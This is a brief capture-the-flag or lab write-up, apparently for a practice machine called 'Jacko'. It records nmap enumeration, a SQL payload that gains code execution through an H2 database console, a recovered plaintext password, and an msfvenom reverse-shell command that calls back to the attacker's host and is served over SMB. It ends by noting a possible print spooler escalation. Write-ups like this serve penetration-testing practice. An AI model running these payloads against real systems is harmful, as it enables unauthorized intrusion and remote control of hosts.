Jacko

IP: 192.168.65.66

Enumeration

Nmap scan

nmap 192.168.65.66 -sV -p- -A 

Service Enumeration

TCP/80

TCP/135

TCP/139/445

Went back and tried to connect to the shares with tony's credentials but neither shared worked.

TCP/7680

TCP/8082

The credentials already in the form will work to log in, just hit connect.

Found tony as username.

LFI

Found version numbers.

Found some credentials in wrapper.conf

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c type wrapper.conf").getInputStream()).useDelimiter("\\Z").next()');

Found tony's credentials. wrapper.ntservice.account=.\tony wrapper.ntservice.password=BeyondLakeBarber399

Had to get a hint here as none of the shells I kept trying worked and had to look at two or three different methods in different walk throughs.

Created reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.65 LPORT=8082 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o revshell.exe

Hosted it via SMB.

sudo smbserver.py -smb2support Share $PWD

Ran my listener and got a shell.

Fixed path because only few commands were running.

set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

Possible printspooler lpe.

Root